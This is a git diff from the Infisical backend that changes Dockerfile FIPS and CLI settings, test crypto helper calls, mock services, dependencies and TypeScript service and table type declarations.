     softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000


 WORKDIR /openssl-build
 RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
     && tar -xf openssl-3.1.2.tar.gz \
@@ -66,7 +66,7 @@ RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
     apt-get update && \
-    apt-get install -y infisical=0.41.89
+    apt-get install -y infisical=0.41.2

 WORKDIR /app

@@ -78,9 +78,8 @@ RUN npm install
 COPY . .

 ENV HOST=0.0.0.0
-ENV OPENSSL_CONF=/app/nodejs.fips.cnf
+ENV OPENSSL_CONF=/app/nodejs.cnf
 ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
-# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
-ENV FIPS_ENABLED=true
+ENV NODE_OPTIONS=--force-fips

 CMD ["npm", "run", "dev:docker"]
@@ -8,9 +8,6 @@ import { Lock } from "@app/lib/red-lock";
 export const mockKeyStore = (): TKeyStoreFactory => {
   const store: Record<string, string | number | Buffer> = {};

-  const getRegex = (pattern: string) =>
-    new RE2(`^${pattern.replace(/[-[\]/{}()+?.\\^$|]/g, "\\$&").replace(/\*/g, ".*")}$`);
-
   return {
     setItem: async (key, value) => {
       store[key] = value;
@@ -26,7 +23,7 @@ export const mockKeyStore = (): TKeyStoreFactory => {
       return 1;
     },
     deleteItems: async ({ pattern, batchSize = 500, delay = 1500, jitter = 200 }) => {
-      const regex = getRegex(pattern);
+      const regex = new RE2(`^${pattern.replace(/[-[\]/{}()+?.\\^$|]/g, "\\$&").replace(/\*/g, ".*")}$`);
       let totalDeleted = 0;
       const keys = Object.keys(store);

@@ -56,27 +53,6 @@ export const mockKeyStore = (): TKeyStoreFactory => {
     incrementBy: async () => {
       return 1;
     },
-    getItems: async (keys) => {
-      const values = keys.map((key) => {
-        const value = store[key];
-        if (typeof value === "string") {
-          return value;
-        }
-        return null;
-      });
-      return values;
-    },
-    getKeysByPattern: async (pattern) => {
-      const regex = getRegex(pattern);
-      const keys = Object.keys(store);
-      return keys.filter((key) => regex.test(key));
-    },
-    deleteItemsByKeyIn: async (keys) => {
-      for (const key of keys) {
-        delete store[key];
-      }
-      return keys.length;
-    },
     acquireLock: () => {
       return Promise.resolve({
         release: () => {}
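The getRegex helper this hunk removes is worth isolating: it converts a Redis-style glob pattern into an anchored RE2 by escaping regex metacharacters and widening `*` into `.*`. A self-contained sketch, reconstructed from the helper as it appears in the diff (again assuming the `re2` npm package):

```ts
import RE2 from "re2";

// Glob -> anchored RE2: escape metacharacters, then let `*` match anything.
const getRegex = (pattern: string): RE2 =>
  new RE2(`^${pattern.replace(/[-[\]/{}()+?.\\^$|]/g, "\\$&").replace(/\*/g, ".*")}$`);

const regex = getRegex("session:*:token");
console.log(regex.test("session:abc:token")); // true  (glob matches)
console.log(regex.test("session:abc:other")); // false (suffix differs)
console.log(regex.test("session:a.b:token")); // true  ('.' was escaped, not special)
```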
@@ -26,7 +26,6 @@ export const mockQueue = (): TQueueServiceFactory => {
     getRepeatableJobs: async () => [],
     clearQueue: async () => {},
     stopJobById: async () => {},
-    stopJobByIdPg: async () => {},
     stopRepeatableJobByJobId: async () => true,
     stopRepeatableJobByKey: async () => true
   };
@@ -1,9 +1,8 @@
 import crypto from "node:crypto";

 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
 import { initEnvConfig } from "@app/lib/config/env";
-import { SymmetricKeySize } from "@app/lib/crypto";
-import { crypto } from "@app/lib/crypto/cryptography";
 import { initLogger, logger } from "@app/lib/logger";
+import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";

 const createServiceToken = async (
   scopes: { environment: string; secretPath: string }[],
@@ -27,8 +26,7 @@ const createServiceToken = async (
   });
   const { user: userInfo } = JSON.parse(userInfoRes.payload);
   const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-
-  const projectKey = crypto.encryption().asymmetric().decrypt({
+  const projectKey = decryptAsymmetric({
     ciphertext: projectKeyEnc.encryptedKey,
     nonce: projectKeyEnc.nonce,
     publicKey: projectKeyEnc.sender.publicKey,
@@ -36,13 +34,7 @@ const createServiceToken = async (
   });

   const randomBytes = crypto.randomBytes(16).toString("hex");
-
-  const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
-    plaintext: projectKey,
-    key: randomBytes,
-    keySize: SymmetricKeySize.Bits128
-  });
-
+  const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
   const serviceTokenRes = await testServer.inject({
     method: "POST",
     url: "/api/v2/service-token",
@@ -145,9 +137,6 @@ describe("Service token secret ops", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
-    initLogger();
-    await initEnvConfig(testSuperAdminDAL, logger);
-
     serviceToken = await createServiceToken(
       [{ secretPath: "/**", environment: seedData1.environment.slug }],
       ["read", "write"]
@@ -164,13 +153,11 @@ describe("Service token secret ops", async () => {
     expect(serviceTokenInfoRes.statusCode).toBe(200);
     const serviceTokenInfo = serviceTokenInfoRes.json();
     const serviceTokenParts = serviceToken.split(".");
-
-    projectKey = crypto.encryption().symmetric().decrypt({
+    projectKey = decryptSymmetric128BitHexKeyUTF8({
       key: serviceTokenParts[3],
       tag: serviceTokenInfo.tag,
       ciphertext: serviceTokenInfo.encryptedKey,
-      iv: serviceTokenInfo.iv,
-      keySize: SymmetricKeySize.Bits128
+      iv: serviceTokenInfo.iv
     });

     // create a deep folder
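This hunk toggles between two call shapes for the same operation: a namespaced facade (`crypto.encryption().symmetric().encrypt({...})`) and standalone helpers (`encryptSymmetric128BitHexKeyUTF8(...)`). A minimal, self-contained sketch of what such helpers could look like — not Infisical's implementation; AES-128-GCM, a hex-decoded 16-byte key, a 96-bit IV, and base64-encoded fields are all assumptions chosen to be consistent with the 128-bit-hex-key naming and the iv/tag fields in the test:

```ts
import { createCipheriv, createDecipheriv, randomBytes } from "node:crypto";

type TSymmetricBox = { ciphertext: string; iv: string; tag: string };

const encryptSymmetric128BitHexKeyUTF8 = (plaintext: string, hexKey: string): TSymmetricBox => {
  const iv = randomBytes(12); // 96-bit IV, the conventional size for GCM
  const cipher = createCipheriv("aes-128-gcm", Buffer.from(hexKey, "hex"), iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, "utf8"), cipher.final()]);
  return {
    ciphertext: ciphertext.toString("base64"),
    iv: iv.toString("base64"),
    tag: cipher.getAuthTag().toString("base64") // GCM authentication tag
  };
};

const decryptSymmetric128BitHexKeyUTF8 = ({ key, ciphertext, iv, tag }: TSymmetricBox & { key: string }): string => {
  const decipher = createDecipheriv("aes-128-gcm", Buffer.from(key, "hex"), Buffer.from(iv, "base64"));
  decipher.setAuthTag(Buffer.from(tag, "base64")); // must be set before final()
  return Buffer.concat([decipher.update(Buffer.from(ciphertext, "base64")), decipher.final()]).toString("utf8");
};

// Usage mirroring the test: a fresh 128-bit key as a 32-char hex string.
const key = randomBytes(16).toString("hex");
const box = encryptSymmetric128BitHexKeyUTF8("project-key-material", key);
console.log(decryptSymmetric128BitHexKeyUTF8({ ...box, key })); // "project-key-material"
```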
@@ -1,8 +1,6 @@
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
 import { initEnvConfig } from "@app/lib/config/env";
-import { crypto } from "@app/lib/crypto/cryptography";
-import { initLogger, logger } from "@app/lib/logger";
 import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
 import { AuthMode } from "@app/services/auth/auth-type";

 const createSecret = async (dto: {
@@ -157,9 +155,6 @@ describe("Secret V3 Router", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
-    initLogger();
-    await initEnvConfig(testSuperAdminDAL, logger);
-
     const projectKeyRes = await testServer.inject({
       method: "GET",
       url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
@@ -178,7 +173,7 @@ describe("Secret V3 Router", async () => {
     });
     const { user: userInfo } = JSON.parse(userInfoRes.payload);
     const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-    projectKey = crypto.encryption().asymmetric().decrypt({
+    projectKey = decryptAsymmetric({
       ciphertext: projectKeyEncryptionDetails.encryptedKey,
       nonce: projectKeyEncryptionDetails.nonce,
       publicKey: projectKeyEncryptionDetails.sender.publicKey,
@@ -674,7 +669,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
     const { user: userInfo } = JSON.parse(userInfoRes.payload);

     const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-    const projectKey = crypto.encryption().asymmetric().decrypt({
+    const projectKey = decryptAsymmetric({
       ciphertext: projectKeyEnc.encryptedKey,
       nonce: projectKeyEnc.nonce,
       publicKey: projectKeyEnc.sender.publicKey,
@@ -690,7 +685,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
     });
     expect(projectBotRes.statusCode).toEqual(200);
     const projectBot = JSON.parse(projectBotRes.payload).bot;
-    const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);
+    const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);

     // set bot as active
     const setBotActive = await testServer.inject({
@@ -2,11 +2,11 @@
 import "ts-node/register";

 import dotenv from "dotenv";
-import { crypto } from "@app/lib/crypto/cryptography";
+import jwt from "jsonwebtoken";
 import path from "path";

 import { seedData1 } from "@app/db/seed-data";
-import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
+import { initEnvConfig } from "@app/lib/config/env";
 import { initLogger } from "@app/lib/logger";
 import { main } from "@app/server/app";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -17,7 +17,6 @@ import { queueServiceFactory } from "@app/queue";
 import { keyStoreFactory } from "@app/keystore/keystore";
 import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
 import { buildRedisFromConfig } from "@app/lib/config/redis";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
 export default {
@@ -25,17 +24,13 @@ export default {
   transformMode: "ssr",
   async setup() {
     const logger = initLogger();
-    const databaseCredentials = getDatabaseCredentials(logger);
-
+    const envConfig = initEnvConfig(logger);
     const db = initDbConnection({
-      dbConnectionUri: databaseCredentials.dbConnectionUri,
-      dbRootCert: databaseCredentials.dbRootCert
+      dbConnectionUri: envConfig.DB_CONNECTION_URI,
+      dbRootCert: envConfig.DB_ROOT_CERT
     });

-    const superAdminDAL = superAdminDALFactory(db);
-    const envCfg = await initEnvConfig(superAdminDAL, logger);
-
-    const redis = buildRedisFromConfig(envCfg);
+    const redis = buildRedisFromConfig(envConfig);
     await redis.flushdb("SYNC");

     try {
@@ -60,10 +55,10 @@ export default {
       });

       const smtp = mockSmtpServer();
-      const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
-      const keyStore = keyStoreFactory(envCfg);
+      const queue = queueServiceFactory(envConfig, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
+      const keyStore = keyStoreFactory(envConfig);

-      const hsmModule = initializeHsmModule(envCfg);
+      const hsmModule = initializeHsmModule(envConfig);
       hsmModule.initialize();

       const server = await main({
@@ -73,17 +68,14 @@ export default {
         queue,
         keyStore,
         hsmModule: hsmModule.getModule(),
-        superAdminDAL,
-        redis,
-        envConfig: envCfg
+        envConfig
       });

       // @ts-expect-error type
       globalThis.testServer = server;
-      // @ts-expect-error type
-      globalThis.testSuperAdminDAL = superAdminDAL;
       // @ts-expect-error type
-      globalThis.jwtAuthToken = crypto.jwt().sign(
+      globalThis.jwtAuthToken = jwt.sign(
         {
           authTokenType: AuthTokenType.ACCESS_TOKEN,
           userId: seedData1.id,
@@ -92,8 +84,8 @@ export default {
           organizationId: seedData1.organization.id,
           accessVersion: 1
         },
-        envCfg.AUTH_SECRET,
-        { expiresIn: envCfg.JWT_AUTH_LIFETIME }
+        envConfig.AUTH_SECRET,
+        { expiresIn: envConfig.JWT_AUTH_LIFETIME }
       );
     } catch (error) {
       // eslint-disable-next-line
@@ -110,8 +102,6 @@ export default {
       // @ts-expect-error type
       delete globalThis.testServer;
-      // @ts-expect-error type
-      delete globalThis.testSuperAdminDAL;
       // @ts-expect-error type
       delete globalThis.jwtToken;
       // called after all tests with this env have been run
       await db.migrate.rollback(
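The test-setup hunk above swaps a facade call (`crypto.jwt().sign(...)`) for the `jsonwebtoken` package directly; both take the same payload/secret/options triple. A minimal sketch of that direct usage — the secret and payload values here are placeholders, not values from the repo:

```ts
import jwt from "jsonwebtoken";

const AUTH_SECRET = "dev-only-secret"; // stand-in for envConfig.AUTH_SECRET

const token = jwt.sign(
  { authTokenType: "accessToken", userId: "user_123", accessVersion: 1 },
  AUTH_SECRET,
  { expiresIn: "1d" } // stand-in for envConfig.JWT_AUTH_LIFETIME
);

// Throws if the signature or expiry is invalid; returns the decoded payload.
console.log(jwt.verify(token, AUTH_SECRET));
```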
backend/package-lock.json (generated) — 988 changed lines
(File diff suppressed because it is too large.)
@@ -84,7 +84,6 @@
     "@babel/plugin-syntax-import-attributes": "^7.24.7",
     "@babel/preset-env": "^7.18.10",
     "@babel/preset-react": "^7.24.7",
-    "@smithy/types": "^4.3.1",
     "@types/bcrypt": "^5.0.2",
     "@types/jmespath": "^0.15.2",
     "@types/jsonwebtoken": "^9.0.5",
@@ -150,7 +149,6 @@
     "@fastify/static": "^7.0.4",
     "@fastify/swagger": "^8.14.0",
     "@fastify/swagger-ui": "^2.1.0",
-    "@gitbeaker/rest": "^42.5.0",
     "@google-cloud/kms": "^4.5.0",
     "@infisical/quic": "^1.0.8",
     "@node-saml/passport-saml": "^5.0.1",
@@ -84,11 +84,6 @@ const getZodDefaultValue = (type: unknown, value: string | number | boolean | Object) => {
   }
 };

-const bigIntegerColumns: Record<string, string[]> = {
-  "folder_commits": ["commitId"]
-};
-
-
 const main = async () => {
   const tables = (
     await db("information_schema.tables")
@@ -113,9 +108,6 @@ const main = async () => {
       const columnName = columnNames[colNum];
       const colInfo = columns[columnName];
       let ztype = getZodPrimitiveType(colInfo.type);
-      if (bigIntegerColumns[tableName]?.includes(columnName)) {
-        ztype = "z.coerce.bigint()";
-      }
       if (["zodBuffer"].includes(ztype)) {
        zodImportSet.add(ztype);
       }
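The override the schema generator loses here is a simple table/column lookup: columns listed in bigIntegerColumns get mapped to a bigint-coercing Zod type instead of the default numeric mapping, so 64-bit IDs survive the round trip through strings. A standalone sketch of that logic (zodTypeFor is a hypothetical helper name, not from the repo):

```ts
import { z } from "zod";

// Tables whose listed columns must be coerced to bigint rather than number.
const bigIntegerColumns: Record<string, string[]> = {
  folder_commits: ["commitId"]
};

const zodTypeFor = (tableName: string, columnName: string, defaultType: string): string =>
  bigIntegerColumns[tableName]?.includes(columnName) ? "z.coerce.bigint()" : defaultType;

console.log(zodTypeFor("folder_commits", "commitId", "z.number()")); // "z.coerce.bigint()"

// Why coercion matters: values beyond Number.MAX_SAFE_INTEGER stay exact.
console.log(z.coerce.bigint().parse("9007199254740993")); // 9007199254740993n
```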
backend/src/@types/fastify-zod.d.ts (vendored) — 2 changed lines

@@ -2,7 +2,6 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression

 import { CustomLogger } from "@app/lib/logger/logger";
 import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
-import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 declare global {
   type FastifyZodProvider = FastifyInstance<
@@ -15,6 +14,5 @@ declare global {

   // used only for testing
   const testServer: FastifyZodProvider;
-  const testSuperAdminDAL: TSuperAdminDALFactory;
   const jwtAuthToken: string;
 }
backend/src/@types/fastify.d.ts (vendored) — 48 changed lines

@@ -3,15 +3,16 @@ import "fastify";
 import { Redis } from "ioredis";

 import { TUsers } from "@app/db/schemas";
-import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-types";
-import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-types";
-import { TAssumePrivilegeServiceFactory } from "@app/ee/services/assume-privilege/assume-privilege-types";
-import { TAuditLogServiceFactory, TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
-import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-types";
-import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-types";
+import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-service";
+import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-service";
+import { TAssumePrivilegeServiceFactory } from "@app/ee/services/assume-privilege/assume-privilege-service";
+import { TAuditLogServiceFactory } from "@app/ee/services/audit-log/audit-log-service";
+import { TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
+import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-service";
+import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-service";
 import { TCertificateEstServiceFactory } from "@app/ee/services/certificate-est/certificate-est-service";
-import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-types";
-import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-types";
+import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-service";
+import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-service";
 import { TExternalKmsServiceFactory } from "@app/ee/services/external-kms/external-kms-service";
 import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service";
 import { TGithubOrgSyncServiceFactory } from "@app/ee/services/github-org-sync/github-org-sync-service";
@@ -24,25 +25,24 @@ import { TKmipServiceFactory } from "@app/ee/services/kmip/kmip-service";
 import { TLdapConfigServiceFactory } from "@app/ee/services/ldap-config/ldap-config-service";
 import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
 import { TOidcConfigServiceFactory } from "@app/ee/services/oidc/oidc-config-service";
-import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
-import { TPitServiceFactory } from "@app/ee/services/pit/pit-service";
-import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-types";
-import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-types";
-import { RateLimitConfiguration, TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-types";
-import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-types";
-import { TScimServiceFactory } from "@app/ee/services/scim/scim-types";
+import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service";
+import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-service";
+import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-service";
+import { TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-service";
+import { RateLimitConfiguration } from "@app/ee/services/rate-limit/rate-limit-types";
+import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-service";
+import { TScimServiceFactory } from "@app/ee/services/scim/scim-service";
 import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service";
 import { TSecretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service";
 import { TSecretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service";
 import { TSecretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service";
 import { TSecretScanningServiceFactory } from "@app/ee/services/secret-scanning/secret-scanning-service";
-import { TSecretScanningV2ServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-service";
 import { TSecretSnapshotServiceFactory } from "@app/ee/services/secret-snapshot/secret-snapshot-service";
 import { TSshCertificateAuthorityServiceFactory } from "@app/ee/services/ssh/ssh-certificate-authority-service";
 import { TSshCertificateTemplateServiceFactory } from "@app/ee/services/ssh-certificate-template/ssh-certificate-template-service";
 import { TSshHostServiceFactory } from "@app/ee/services/ssh-host/ssh-host-service";
 import { TSshHostGroupServiceFactory } from "@app/ee/services/ssh-host-group/ssh-host-group-service";
-import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-types";
+import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-service";
 import { TAuthMode } from "@app/server/plugins/auth/inject-identity";
 import { TApiKeyServiceFactory } from "@app/services/api-key/api-key-service";
 import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service";
@@ -58,12 +58,10 @@ import { TCertificateTemplateServiceFactory } from "@app/services/certificate-te
 import { TCmekServiceFactory } from "@app/services/cmek/cmek-service";
 import { TExternalGroupOrgRoleMappingServiceFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-service";
 import { TExternalMigrationServiceFactory } from "@app/services/external-migration/external-migration-service";
-import { TFolderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service";
 import { TGroupProjectServiceFactory } from "@app/services/group-project/group-project-service";
 import { THsmServiceFactory } from "@app/services/hsm/hsm-service";
 import { TIdentityServiceFactory } from "@app/services/identity/identity-service";
 import { TIdentityAccessTokenServiceFactory } from "@app/services/identity-access-token/identity-access-token-service";
-import { TIdentityAliCloudAuthServiceFactory } from "@app/services/identity-alicloud-auth/identity-alicloud-auth-service";
 import { TIdentityAwsAuthServiceFactory } from "@app/services/identity-aws-auth/identity-aws-auth-service";
 import { TIdentityAzureAuthServiceFactory } from "@app/services/identity-azure-auth/identity-azure-auth-service";
 import { TIdentityGcpAuthServiceFactory } from "@app/services/identity-gcp-auth/identity-gcp-auth-service";
@@ -74,7 +72,6 @@ import { TAllowedFields } from "@app/services/identity-ldap-auth/identity-ldap-a
 import { TIdentityOciAuthServiceFactory } from "@app/services/identity-oci-auth/identity-oci-auth-service";
 import { TIdentityOidcAuthServiceFactory } from "@app/services/identity-oidc-auth/identity-oidc-auth-service";
 import { TIdentityProjectServiceFactory } from "@app/services/identity-project/identity-project-service";
-import { TIdentityTlsCertAuthServiceFactory } from "@app/services/identity-tls-cert-auth/identity-tls-cert-auth-types";
 import { TIdentityTokenAuthServiceFactory } from "@app/services/identity-token-auth/identity-token-auth-service";
 import { TIdentityUaServiceFactory } from "@app/services/identity-ua/identity-ua-service";
 import { TIntegrationServiceFactory } from "@app/services/integration/integration-service";
@@ -86,7 +83,6 @@ import { TOrgAdminServiceFactory } from "@app/services/org-admin/org-admin-servi
 import { TPkiAlertServiceFactory } from "@app/services/pki-alert/pki-alert-service";
 import { TPkiCollectionServiceFactory } from "@app/services/pki-collection/pki-collection-service";
 import { TPkiSubscriberServiceFactory } from "@app/services/pki-subscriber/pki-subscriber-service";
-import { TPkiTemplatesServiceFactory } from "@app/services/pki-templates/pki-templates-service";
 import { TProjectServiceFactory } from "@app/services/project/project-service";
 import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service";
 import { TProjectEnvServiceFactory } from "@app/services/project-env/project-env-service";
@@ -121,10 +117,6 @@ declare module "@fastify/request-context" {
       oidc?: {
         claims: Record<string, string>;
       };
-      kubernetes?: {
-        namespace: string;
-        name: string;
-      };
     };
     identityPermissionMetadata?: Record<string, unknown>; // filled by permission service
     assumedPrivilegeDetails?: { requesterId: string; actorId: string; actorType: ActorType; projectId: string };
@@ -218,8 +210,6 @@ declare module "fastify" {
     identityUa: TIdentityUaServiceFactory;
     identityKubernetesAuth: TIdentityKubernetesAuthServiceFactory;
     identityGcpAuth: TIdentityGcpAuthServiceFactory;
-    identityAliCloudAuth: TIdentityAliCloudAuthServiceFactory;
-    identityTlsCertAuth: TIdentityTlsCertAuthServiceFactory;
     identityAwsAuth: TIdentityAwsAuthServiceFactory;
     identityAzureAuth: TIdentityAzureAuthServiceFactory;
     identityOciAuth: TIdentityOciAuthServiceFactory;
@@ -280,11 +270,7 @@ declare module "fastify" {
     microsoftTeams: TMicrosoftTeamsServiceFactory;
     assumePrivileges: TAssumePrivilegeServiceFactory;
     githubOrgSync: TGithubOrgSyncServiceFactory;
-    folderCommit: TFolderCommitServiceFactory;
-    pit: TPitServiceFactory;
-    secretScanningV2: TSecretScanningV2ServiceFactory;
     internalCertificateAuthority: TInternalCertificateAuthorityServiceFactory;
-    pkiTemplate: TPkiTemplatesServiceFactory;
   };
   // this is exclusive use for middlewares in which we need to inject data
   // everywhere else access using service layer
121
backend/src/@types/knex.d.ts
vendored
121
backend/src/@types/knex.d.ts
vendored
@ -6,9 +6,6 @@ import {
  TAccessApprovalPoliciesApprovers,
  TAccessApprovalPoliciesApproversInsert,
  TAccessApprovalPoliciesApproversUpdate,
  TAccessApprovalPoliciesBypassers,
  TAccessApprovalPoliciesBypassersInsert,
  TAccessApprovalPoliciesBypassersUpdate,
  TAccessApprovalPoliciesInsert,
  TAccessApprovalPoliciesUpdate,
  TAccessApprovalRequests,

@ -80,24 +77,6 @@ import {
  TExternalKms,
  TExternalKmsInsert,
  TExternalKmsUpdate,
  TFolderCheckpointResources,
  TFolderCheckpointResourcesInsert,
  TFolderCheckpointResourcesUpdate,
  TFolderCheckpoints,
  TFolderCheckpointsInsert,
  TFolderCheckpointsUpdate,
  TFolderCommitChanges,
  TFolderCommitChangesInsert,
  TFolderCommitChangesUpdate,
  TFolderCommits,
  TFolderCommitsInsert,
  TFolderCommitsUpdate,
  TFolderTreeCheckpointResources,
  TFolderTreeCheckpointResourcesInsert,
  TFolderTreeCheckpointResourcesUpdate,
  TFolderTreeCheckpoints,
  TFolderTreeCheckpointsInsert,
  TFolderTreeCheckpointsUpdate,
  TGateways,
  TGatewaysInsert,
  TGatewaysUpdate,

@ -125,9 +104,6 @@ import {
  TIdentityAccessTokens,
  TIdentityAccessTokensInsert,
  TIdentityAccessTokensUpdate,
  TIdentityAlicloudAuths,
  TIdentityAlicloudAuthsInsert,
  TIdentityAlicloudAuthsUpdate,
  TIdentityAwsAuths,
  TIdentityAwsAuthsInsert,
  TIdentityAwsAuthsUpdate,

@ -164,9 +140,6 @@ import {
  TIdentityProjectMemberships,
  TIdentityProjectMembershipsInsert,
  TIdentityProjectMembershipsUpdate,
  TIdentityTlsCertAuths,
  TIdentityTlsCertAuthsInsert,
  TIdentityTlsCertAuthsUpdate,
  TIdentityTokenAuths,
  TIdentityTokenAuthsInsert,
  TIdentityTokenAuthsUpdate,

@ -303,9 +276,6 @@ import {
  TSecretApprovalPoliciesApprovers,
  TSecretApprovalPoliciesApproversInsert,
  TSecretApprovalPoliciesApproversUpdate,
  TSecretApprovalPoliciesBypassers,
  TSecretApprovalPoliciesBypassersInsert,
  TSecretApprovalPoliciesBypassersUpdate,
  TSecretApprovalPoliciesInsert,
  TSecretApprovalPoliciesUpdate,
  TSecretApprovalRequests,

@ -360,24 +330,9 @@ import {
  TSecretRotationV2SecretMappingsInsert,
  TSecretRotationV2SecretMappingsUpdate,
  TSecrets,
  TSecretScanningConfigs,
  TSecretScanningConfigsInsert,
  TSecretScanningConfigsUpdate,
  TSecretScanningDataSources,
  TSecretScanningDataSourcesInsert,
  TSecretScanningDataSourcesUpdate,
  TSecretScanningFindings,
  TSecretScanningFindingsInsert,
  TSecretScanningFindingsUpdate,
  TSecretScanningGitRisks,
  TSecretScanningGitRisksInsert,
  TSecretScanningGitRisksUpdate,
  TSecretScanningResources,
  TSecretScanningResourcesInsert,
  TSecretScanningResourcesUpdate,
  TSecretScanningScans,
  TSecretScanningScansInsert,
  TSecretScanningScansUpdate,
  TSecretSharing,
  TSecretSharingInsert,
  TSecretSharingUpdate,

@ -792,16 +747,6 @@ declare module "knex/types/tables" {
      TIdentityGcpAuthsInsert,
      TIdentityGcpAuthsUpdate
    >;
    [TableName.IdentityAliCloudAuth]: KnexOriginal.CompositeTableType<
      TIdentityAlicloudAuths,
      TIdentityAlicloudAuthsInsert,
      TIdentityAlicloudAuthsUpdate
    >;
    [TableName.IdentityTlsCertAuth]: KnexOriginal.CompositeTableType<
      TIdentityTlsCertAuths,
      TIdentityTlsCertAuthsInsert,
      TIdentityTlsCertAuthsUpdate
    >;
    [TableName.IdentityAwsAuth]: KnexOriginal.CompositeTableType<
      TIdentityAwsAuths,
      TIdentityAwsAuthsInsert,

@ -875,12 +820,6 @@ declare module "knex/types/tables" {
      TAccessApprovalPoliciesApproversUpdate
    >;

    [TableName.AccessApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
      TAccessApprovalPoliciesBypassers,
      TAccessApprovalPoliciesBypassersInsert,
      TAccessApprovalPoliciesBypassersUpdate
    >;

    [TableName.AccessApprovalRequest]: KnexOriginal.CompositeTableType<
      TAccessApprovalRequests,
      TAccessApprovalRequestsInsert,

@ -904,11 +843,6 @@ declare module "knex/types/tables" {
      TSecretApprovalPoliciesApproversInsert,
      TSecretApprovalPoliciesApproversUpdate
    >;
    [TableName.SecretApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
      TSecretApprovalPoliciesBypassers,
      TSecretApprovalPoliciesBypassersInsert,
      TSecretApprovalPoliciesBypassersUpdate
    >;
